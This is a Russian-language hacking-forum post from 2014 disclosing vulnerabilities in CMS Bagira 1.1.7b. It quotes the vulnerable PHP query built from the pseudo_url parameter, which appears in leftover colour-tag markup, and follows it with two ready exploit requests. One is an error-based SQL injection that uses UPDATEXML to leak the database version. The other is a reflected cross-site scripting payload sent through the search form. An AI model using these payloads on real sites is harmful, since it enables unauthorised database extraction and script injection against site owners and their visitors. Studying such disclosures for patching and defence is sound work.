16.05.2014, 16:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
CMS Bagira
Версия 1.1.7b (последняя)
Официальный сайт http://bagira-cms.ru/
SQL Injection
Уязвимый сценарий: ormPage.php
Уязвимый параметр: pseudo_url
Зависимости: mq=off
Вектор: error-based
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getParentId[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]= (empty([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'p_obj_id <> "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and '[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].= (empty([/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'r_parent_id is NULL'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'r_parent_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT count(p_obj_id) FROM >, >, >
WHERE pseudo_url = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and
lang_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]languages[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and
domain_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domains[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and
r_children_id = p_obj_id and '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' and
o_id = p_obj_id and
o_to_trash = 0;'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]q[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Exploit:
Сообщение от None
GET /BagiraCMS/article
"*(UPDATEXML(1,concat(0x3a,(SELECT version())),4))*"
HTTP/1.1
Host: 127.0.0.1
...
в строке поиска:
Exploit:
Сообщение от None
POST /BagiraCMS/search HTTP/1.1
Host: 127.0.0.1
...
words=
">alert(1)
|
|
|
|